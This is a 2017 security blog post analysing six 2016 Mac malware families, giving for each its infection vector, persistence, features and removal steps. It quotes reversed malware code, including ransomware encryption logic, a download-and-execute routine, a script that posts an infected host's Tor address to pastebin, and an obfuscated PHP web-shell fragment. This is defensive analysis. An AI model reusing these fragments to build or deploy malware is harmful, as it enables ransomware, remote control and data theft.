01 January 2017

Mac Malware of 2016

SRT Community

A cumulative analysis of new OS X malware

Due to sheer volume, Windows malware generally dominates the malicious code and news scene. Of course, Macs are susceptible to malware as well and 2016 saw a handful of new malware targeting Apple computers.

In this blog, I wanted to discuss all Mac malware that appeared this year. While each sample has been reported on before (i.e. by the AV company that discovered it), this blog aims to cumulatively cover all in one place. Moreover, for each, we’ll identify the infection vector, persistence mechanism, features/goals, and describe disinfection.

If you want to play along, all samples can be downloaded from Objective-See’s malware page.

By downloading the samples, you waive all rights to claim punitive, incidental and consequential damages resulting from mishandling or self-infection ;)Also, the ‘disinfection’ instructions provided in this blog are specific to each malware specimen. Often malware can install other malware, or allow an remote attacker to do what ever they want. Thus if you were/are infected by any of these samples, it’s suggested you fully re-install OS X.

I’m presenting a talk at RSA 2017 titled “Meet and Greet with the macOS Malware Class of 2016” In this talk I’ll dive into the details of each of the malware specimens described here. In other words, think of this blog as a preview of my talk!Hope to see you at RSA 🙂


mac malware 2016 patrick wardle


mac malware 2016 patrick wardle

OSX/KeRanger is the first fully-functional, in-the-wild ransomware for OS X!

› infection vector
This malware was unusual for a variety of reasons. First, its infection vector is somewhat (for Mac Malware) unique. In order to surreptitiously infect Mac users, the OSX/KeRanger authors hacked the official website for a popular OS X bittorrent application, ‘Transmission’

mac malware 2016 patrick wardle

With access to the website, the malware authors then infected the legitimate Transmission application with OSX/KeRanger. Specifically, they added a new mach-O binary to application bundle (General.rtf).

mac malware 2016 patrick wardle

The main function of the Transmission.app was modified to execute this malware’s binary:

//build path to source (General.rtf)
__sprintf_chk(pathSrc, 0x0, 0x400, “%s/Resources/General.rtf”, …);//build path to destination (kernel_service)
__sprintf_chk(pathDest, 0x0, 0x400, “%s/Library/kernel_service”, …);

//read in source file
rbx = fopen(pathSrc, “rb”);
var_1448 = fread(r12, 0x1, r13, rbx);

//write it out to destination
r14 = fopen(pathDest, “wb+”);
fwrite(r12, var_1448, 0x1, r14);

//set it to executable
chmod(pathDest, 0x40);

//launch it!

Finally the malware authors re-signed the (now) infected application so that GateKeeper (in its default settings) would not prevent the malware from executing:

mac malware 2016 patrick wardle

Thus, any time an unsuspecting user downloaded and executed the Transmission application (again, from the official Transmission website) the malware would compromise their Mac. Yikes!

› persistence
As far as I know, OSX/KeRanger does not contain any logic nor code to persist itself. Thus if the user reboots their system, or kills the malware’s process, kernel_service, the malware will not be restarted…unless the user re-runs the infected Transmission application.

› features
Another unique aspect of OSX/KeRanger was its payload or goal. In short it attempted to encrypt for ransom, user files. Yes, OSX/KeRanger was the first, fully-functional in-the-wild piece of ransomware targeting Apple computers.

Reversing the malware reveals its ransomware logic:

//encrypt /Users
recursive_task(“/Users”, _encrypt_entry, _putReadme);//encrypt /Volumes
recursive_task(“/Volumes”, _check_ext_encrypt, _putReadme);

//build path to ‘.kernel_complete’
sprintf_chk(0x0, 0x0, 0x400, “%s/Library/.kernel_complete”…);

//write to file
rbx = fopen(0x0, “w”); fwrite(“do not touch this\n”, 0x12, 0x1, rbx);

As shown in the pseudo-code snippet, OSX/KeRanger will encrypt all files under /Users/* as well as all files under /Volumes that match certain extensions (PaloAlto Network’s report noted about 300, including .docs, .jpgs, .zips, .cpp, etc).

For each directory where the ransomware encrypts files, it creates a plaintext ‘read-me’ file the contains instructions to the user how to pay the ransom in order to recover their files:

mac malware 2016 patrick wardle

One final, interesting aspect of OSX/KeRanger is that some researchers have convincingly claimed it is a rewrite or Mac version of the ‘linux.encoder’ ransomware. Their reasoning is quite compelling and seems to confirm that oftentimes malware authors are quite keen on expanding their potential targets by porting the malicious creations to OS X.

› disinfection
Since (AFAIK) OSX/KeRanger does not persist, it is trivial to remove:

  • kill the kernel_service process
  • remove ~/Library/kernel_*
  • upgrade to version 2.93+ of Transmission.app

It should be noted that currently Mac users should be protected anyways, as Apple revoked the signing certificate (ID Z7276PX673), as well as updated their XProtect signatures:

$ cat /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist
4C89E7*83F8FF7457C785C4EBFFFF00000000</string>   …


mac malware 2016 patrick wardle

OSX/Keynap is fairly standard backdoor for OS X with a propensity for stealing credentials, and uses Tor for its communications.

› infection vector
The original infection vector for OSX/Keynap was never discovered. Eset states that, “It is still not clear how victims are initially exposed to OSX/Keydnap. It could be through attachments in spam messages, downloads from untrusted websites…

What is known is that it was distributed in a zip archive which contained a binary named screenshot.jpg . Since the filename contained a space at its end (i.e. “.jpg “) when a user double-clicked it, it would be executed by Terminal.app. In other words, the malware would be run.

mac malware 2016 patrick wardle

Later, it was discovered that the official Transmission website (transmissionbt.com), was hacked again 🙄 …this time, to distribute Keydnap. Just as they had with OSX/KeRanger, the malware authors infected the legitimate Transmission application, by adding an extra binary (License.rtf) then modifying the application’s code to execute it. The infected Transmission application was then (re)signed, with another stolen or fraudulently obtained Apple developer ID: Shaderkin Igor (836QJ8VMCQ):

mac malware 2016 patrick wardle

Thus for a time, any user that downloaded and ran Transmission.app would be infected with OSX/Keydnap.

› persistence

 In order to persist, OSX/Keydnap creates two launch agents, com.apple.iCloud.sync.daemon and com.geticloud.icloud.photo:

mac malware 2016 patrick wardle

The first launch agent plist (com.apple.iCloud.sync.daemon) tells the OS to execute a binary named icloudsyncd. This binary is the backdoor component of the malware.

The second launch agent plist (com.geticloud.icloud.photo) contains a path to the malware’s command and control mechanisms. Named icloudproc, this binary is simply a copy of Tor2Web proxy.

› features
As mentioned, icloudsyncd is the main component of the malware. It provides ‘standard’ backdoor or remote ‘administrative’ capabilities such ability to download and execute a file, including a python scripts:

//exec downloaded python
sprintf(var_430, “/tmp/%s”, rbx);
sprintf(var_830, “python %s”, var_430);chmod(var_430, 0x1c0);

OSX/Keydnap also contains logic to elevate its privileges, albeit in very unsophisticated method; just asking:

mac malware 2016 patrick wardle

Perhaps the most interesting feature of the malware, is its ability to dump credentials and other sensitive information from the keychain. It does this via code from the open-source keychaindump project. (note however, AFAIK, this would generate an “icloudsyncd wants to access the keychain” alert that the user would have to allow):

mac malware 2016 patrick wardle

OSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: “Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server.

lea rdx, qword [0x10000bbe7] ; “”
mov esi, 0x2714
xor eax, eax
mov rdi, rbx
call curl_easy_setopt

› disinfection
OSX/Keydnap can be removed from an infected system, via the following steps:

  1. Via the ‘launchctl unload’ command, unload the backdoor and Tor proxy
  2. Remove the launch agent plist files /Library/LaunchAgents or ~/Library/LaunchAgents com.apple.iCloud.sync.daemon.plist and com.geticloud.icloud.photo.plist
  3. Remove the launch agent binaries & files:

    • a) ~/Library/Application Support/com.apple.iCloud.sync.daemon/

    • b) ~/Library/Application Support/com.geticloud/

Apple has also revoked the Apple developer ID that was used to sign the infected Transmission application:

$ spctl -a -t exec -vv Transmission.app
/Volumes/Transmission/Transmission.app: CSSMERR_TP_CERT_REVOKED


mac malware 2016 patrick wardle

OSX/Eleanor is another basic, albeit ‘feature-complete’ backdoor (php) for Mac computers.

› infection vector
Similar to other OS X malware of 2016, OSX/Eleanor was distributed in an applications via the internet. However, it appears that the malware authors simple (re)created an abandoned application (“EasyDoc Convertor”), as opposed to hacking the official website of a legitimate application.

mac malware 2016 patrick wardle

The malicious, fake EasyDoc Convertor application was hosted on the popular app sharing website Mac Update. Thus, any user that downloaded and ran this application would be infected with Eleanor.

› persistence
OSX/Eleanor installs three(!) launch agents in order to persist its various components. Obviously stealth was not something the malware authors cared about at all 😛 The three launch agents are:

  1. com.getdropbox.dropbox.integritycheck.plist → conn
  2. com.getdropbox.dropbox.timegrabber.plist → check_hostname
  3. com.getdropbox.dropbox.usercontent.plist → dbd

$DIR/com.getdropbox.dropbox.usercontent.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plistlaunchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plist

mv $DIR/com.getdropbox.dropbox.integritycheck.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist

launchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist

mv $DIR/com.getdropbox.dropbox.timegrabber.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist

launchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist

The first launch agent, com.getdropbox.dropbox.integritycheck.plist, executes a binary name conn. This simply sets up a hidden Tor service. The second launch agent, com.getdropbox.dropbox.timegrabber.plist executes a bash script name check_hostname. This script publishes name of the hidden Tor service to pastebin. The final launch agent,com.getdropbox.dropbox.usercontent.plist executes a binary named dbd, which is actually a copy of Apple’s PHP binary:

$ codesign -dvv


Authority=Software Signing
Authority=Apple Code Signing Certification Authority
Authority=Apple Root CA

› features
A rather unique feature of Eleanor is that it essentially turns an infected host into a remotely accessible hidden Tor service. The command and control logic for this is implemented with the conn binary. Via Objective-See’s TaskExplorer utility, it is easy to see the malware listening on both port 9060 and 9061:

mac malware 2016 patrick wardle

The malware gets these port values from one of its Tor configuration files, ~/Library/.dropbox/sync/storage:

$ cat sync/storage

GeoIPFile /Users/user/Library/.dropbox/sync/data/list
GeoIPv6File /Users/user/Library/.dropbox/sync/data/list6HiddenServiceDir /Users/user/Library/.dropbox/sync/hs
HiddenServicePort 80
HiddenServicePort 22

SOCKSPort 9060
ControlPort 9061

The malware also contains a bash script named check_hostname, which, as previously mentioned, is persisted as a launch agent. The purpose of this script is to encrypt the name (address) of the hidden Tor service that was setup by the first launch agent, and then publish that to pastebin. This of course allows the attacker to ‘find’ and connect to the infected host.

encrypt tor name (‘hostname’)
e.g. ‘xjd6uzkuyonxzrz2.onion’

HOSTNAME=$(cat /Users/$USER/Library/.dropbox/sync/hs/hostname | cut -d ‘.’ -f 1 | openssl rsautl -encrypt -pubin -inkey /Users/$USER/Library/.dropbox/public.key | openssl enc -base64 | sed “s/\+/PLUS/g”)post to pastebin

PASTEID=$(curl -sd
df8a73a0813c422465564c913e760d87” “http://pastebin.com/api/api_post.php” | cut -d “/” -f 4)

The core backdoor logic of OSX/Eleanor, is actually implemented in PHP – this is why the malware has a copy of Apple’s PHP binary. Specifically the malware contains a copy of the b374k shell (v 3.2.3) which is available online at github.com/b374k.

b374k shell 3.2.3
Jayalah Indonesiaku
$GLOBALS[‘pass’] = “15bd408e435dc1a1509911cfd8c312f46ed54226″;
$func=”cr”.”eat”.”e_fun”.”cti”.”on”;$b374k=$func(‘$ …

The PHP shell affords the attacker complete over an infected remote computer:

mac malware 2016 patrick wardle
mac malware 2016 patrick wardle

To further extend the features, or capabilities of the malware, it ‘ships’ with several utilities such as netcat and wacaw. The latter, wacaw, is available online where it is described as “a little command-line tool for Mac OS X that allows you to capture both still pictures and video from an attached camera“. Thus an attacker could record the user of an infected Mac.

› disinfection
To remove OSX/Eleanor from a system, simply unload then delete the three aforementioned launch agents. Following this, delete the ‘hidden’ ~/Library/.dropbox directory and the malicious EasyDoc Convertor application.

Apple has also updated XProtect with a signature to block Eleanor:

$ cat /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist

Fake File Opener

mac malware 2016 patrick wardle

OSX/FakeFileOpener is a rather silly piece of adware, though it does have a unique persistence mechanism.

› infection vector
OSX/FakeFileOpener is installed along with other annoying OS X adware when a user is tricked into believing a fake security alert originating from ‘AdvancedMacCleaner.com’

mac malware 2016 patrick wardle

If the user clicks ‘Install Security Upgrade Now’ button and executes the downloaded adware installer package, they will infect themselves. As the OSX/FakeFileOpener adware application, ‘Mac File Opener.app’ was signed, Gatekeeper (in its default settings) would allow it to execute:

mac malware 2016 patrick wardle

› persistence
Thomas Reed (@thomasareed), the malware reverser who originally analyzed the sample noted that, “even more intriguing, this app didn’t have any apparent mechanism for being launched. It hadn’t been added to my login items. There wasn’t a new launch agent or daemon designed to load it. It simply seemed to be sitting there, doing nothing.

Digging deeper, he discovered that this malicious application (by means of its Info.plist file) registers itself as the ‘document handler’ for a myriad of file types. In his words:

Essentially, what this app had done is set itself up as an app that can open most files that are at all likely to be on the typical user’s system. Worse, if there is no other app to open a specific file, this app would be the default. It turns out that this is exactly what that app wants, and it takes full advantage of that fact.

mac malware 2016 patrick wardle

Since this mechanism requires a user launch an application that previously didn’t have a default ‘document handler’ and matches one that ‘Mac File Opener’ registered for, this is somewhat of a ‘unreliable’ persistence mechanism. However, the upside to this method is that it will ‘bypass’ tools such as BlockBlock that monitor for true persistence mechanisms (i.e. ones that require no user interaction, instead are automatically executed each time the system is rebooted or the user logs in).

It’s rare to find novel persistence mechanisms in OS X malware. As such, I previously dedicated an entire blog post, titled, “Click File, App Opens” that digs into the technical details of this persistence and how, at the OS level, such document handlers work.

› features
OSX/FakeFileOpenor is part of a fairly standard run-of-the-mill OS X adware package. It appears that its goal is simply to get the user to install more adware. Specifically, whenever the Mac File Opener.app is launched (when the user tries to open any file it has registered a document handler for), it will display a popup with a ‘Search Web’ button. If the user clicks this button, it will load www.macfileopener.org in a browser window.

mac malware 2016 patrick wardle

void -[AppDelegate searchWeb:]
var_80 = [[@”Adva” stringByAppendingString:@”nced Ma”] stringByAppendingString:@”c Cleaner”];
var_88 = [[@”Mac A” stringByAppendingString:@”dware C”] stringByAppendingString:@”leaner”];
var_90 = [[@”Mac Sp” stringByAppendingString:@”ace Re”] stringByAppendingString:@”viver”];
var_98 = [[@”Disk R” stringByAppendingString:@”evi”] stringByAppendingString:@”ver”];
var_A0 = [[@”Disk Cl” stringByAppendingString:@”eanu”] stringByAppendingString:@”p Pro”];
….   [[NSWorkspace sharedWorkspace] openURL:[NSURL URLWithString:[NSString stringWithFormat:@”http://macfileopener.com/
 ext/%@/?amc=%@&madc=%@&msr=%@&drv=%@&dcp=%@”, [var_30 extension], var_58, var_60, var_68, var_70, var_78]]];

This website will often display other adware-related popups and alerts to trick the user into downloading and installing even more malware. As Thomas Reed notes; “these pages will download other junk PCVARK apps, such as Mac Adware Remover or Mac Space Reviver.

mac malware 2016 patrick wardle

› disinfection
To remove OSX/FakeFileOpenor, simply delete the Mac File Opener application. Behind the scenes this will cause the OS to also unregister its document handlers:

# fs_usage -w -f filesystem | grep csstorerename com.apple.LaunchServices-134501.csstore~ lsd.31116
open com.apple.LaunchServices-134501.csstore lsd.31116
WrData[AT2] com.apple.LaunchServices-134501.csstore lsd.31116
WrData[AT2] com.apple.LaunchServices-134501.csstore lsd.31116

$ /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework
/Support/lsregister -dump | grep “Mac File Opener” | wc

0 0 0


mac malware 2016 patrick wardle

While OSX/Mokes does support a wide range of features, at its core, it’s still a fairly standard OS X backdoor.

› infection vector
How user are become infected by OSX/Mokes is still unknown. Kaspersky, the AV company that discovered it, stated, “…we can only speculate how this malware makes it to the victim machine. All vectors are possible: exploits, installation via another previously installed malware and of course via social engineering.

› persistence
Launch Agents are the preferred method of persistence for OS X malware. OSX/Mokes conforms to this trend installing itself launch agent via the storeuserd.plist in ~/Library/LaunchAgents/. Looking at its disassembly, its easy to find the embedded template the malware uses for the launch agent:

db ‘<?xml version=”1.0″ encoding=”UTF-8″?>’,0Ah
db ‘<plist version=”1.0″>’,0Ah
db ‘<dict>’,0Ah
db 9,'<key>Label</key>’,0Ah
db 9,'<string>%1</string>’,0Ah
db 9,'<key>ProgramArguments</key>’,0Ah
db 9,'<array>’,0Ah
db 9,9,'<string>%2</string>’,0Ah
db 9,'</array>’,0Ah
db 9,'<key>RunAtLoad</key>’,0Ah
db 9,'<true/>’,0Ah
db 9,'<key>KeepAlive</key>’,0Ah
db 9,'<true/>’,0Ah
db ‘</dict>’,0Ah
db ‘</plist>’,0Ah,0

mac malware 2016 patrick wardle

› features
Besides basic features such as download and execute, OSX/Mokes supports a fairly wide range of other capabilities as noted by Kaspersky: “This malware…is able to steal various types of data from the victim’s machine (Screenshots, Audio-/Video-Captures, Office-Documents, Keystrokes).” One can confirm this by reversing the malware’s binary. For example, below are several hard-coded file search constants:

0000001C unicode :/file-search
0000000E unicode *.xlsx
0000000C unicode *.xls
0000000E unicode *.docx
0000000C unicode *.doc

The malware also monitors for removable media (e.g. USB sticks). To record the user, the malware utilizes the QT. This cross-platform framework contains OS X-specific webcams recording code:

//embedded QT methods
(AVFCameraService *,QObject *)
AVFMediaRecorderControl::setupSessionForCapture(void)//disassembly of ‘setupSessionForCapture’ method
AVFMediaRecorderControl::setupSessionForCapture(void) proc

call AVFCameraSession::state(void)

call AVFAudioInputSelectorControl::createCaptureDevice(void)

lea rdx, “Could not connect the video recorder”

call QMediaRecorderControl::error(int,QString const&)

› disinfection
Removing OSX/Mokes is a touch complex, as the malware may install itself into multiple locations. Once the malware is detected though, simply unload its launch agent (e.g. launchctl unload ~/Library/LaunchAgents/storeuserd.plist) then delete its binary (e.g. storeuserd).

Besides the standard storeuserd name, the malware may install itself to:

  • ~/Library/com.apple.spotlight/SpotlightHelper
  • ~/Library/Dock/com.apple.dock.cache
  • ~/Library/Skype/SkypeHelper
  • ~/Library/Dropbox/DropboxCache
  • ~/Library/Google/Chrome/nacld
  • ~/Library/Firefox/Profiles/profiled


mac malware 2016 patrick wardle

Russian cyber-operations were a popular topic in 2016. OSX/Komplex is one of the Russian’s (APT 28/Fancy Bear’s) OS X implants.

› infection vector
OSX/Komplex is a Mac application that is distributed via email (as an attachment). When executed, it will infect the system, but also display an PDF document in a (lame) attempt to hide the infection. The antivirus company Intego, notes that:

The person who receives the email may think they are opening a PDF file with future plans for the Russian aerospace program, but in fact, it is a Trojan that will install files on the system and connect to a remote command & control (c&c) server.

mac malware 2016 patrick wardle

Looking at the disassembly of the malware’s main function shows the malware opening the embedded PDF, via the Preview application:

int main(int arg0, int arg1)

var_38 = [NSSearchPathForDirectoriesInDomains(0xf, 0x1, 0x1) objectAtIndex:0x0];
var_48 = [NSString stringWithFormat:@”SetFile -a E %@/roskosmos_2015-2025.pdf”, var_38];
var_50 = [NSString stringWithFormat:@”rm -rf %@/roskosmos_2015-2025.app”, var_38];
var_58 = [NSString stringWithFormat:@”open -a Preview.app %@/roskosmos_2015-2025.pdf”, var_38];

   system([var_50 UTF8String]);
system([var_48 UTF8String]);
system([var_58 UTF8String]);

› persistence
How does this malware persist? If you guessed launch agent, you are right! OSX/Komplex persists via ~/Library/LaunchAgents/com.apple.updates.plist. This persistent launch agent plist, points to a malware’s binary which is located in /Users/Shared/.local/kextd.

$ cat ~/Library/LaunchAgents/com.apple.updates.plist
<?xml version=”1.0″ encoding=”UTF-8″?>
<plist version=”1.0″>

› features
When executed, OSX/Komplex first checks if it is being debugged or executed on a system that is not connected to the internet:

int main(int argc, char* argv[])
{   if ((AmIBeingDebugged() & 0x1) == 0x0)
while ((connectedToInternet() & 0x1 & 0x1) == 0x0)
rax = sub_100005b40();
rax = 0x0;

return rax;

OSX/Komplex implements only few basic features. However, these are sufficient to allow a remote attacker to completely control an infected host. These features include:

  • download a file
  • delete a file
  • configure the backdoor
  • executing a file
  • executing a shell command

$ nm Komplex | c++filt -p -i | grep File
0000000100001e60 T FileExplorer::executeFile(char const*, unsigned long)
0000000100001b90 T FileExplorer::getFileName()
0000000100001b70 T FileExplorer::setFileName(char*)
0000000100001e00 T FileExplorer::setParameters(char*)
0000000100001bd0 T FileExplorer::executeShellCommand()
0000000100001e20 T FileExplorer::setRemove()

Besides the Russia connection, OSX/Komplex is rather interesting as the PaloAlto researchers note it may have actually been spotted before. In 2015, BAE systems released a report title “New Mac OS Malware Exploits Mackeeper.” In this report they describe a new (unnamed) piece of malware that exploited a remote vulnerability in the infamous MacKeeper software in order to infect Mac users. The PaloAlto researchers noted a lot of similar code, leading them to state, “these overlaps suggest that the Trojan delivered by the MacKeeper vulnerability was in fact the Komplex Trojan.

› disinfection
It is trivial to remove OSX/Komplex. First simply unload the malware’s launch agent (~/Library/LaunchAgents/com.apple.updates.plist). Then delete both the launch agent plist and binary:

$ launchctl unload ~/Library/LaunchAgents/com.apple.updates.plist$ rm ~/Library/LaunchAgents/com.apple.updates.plist

$ rm /Users/Shared/.local/kextd

Well that’s a wrap! In this blog we discussed (all?) Mac malware that emerged in 2016. Hopefully 2017 will bring us lots of new malware to play with 🙂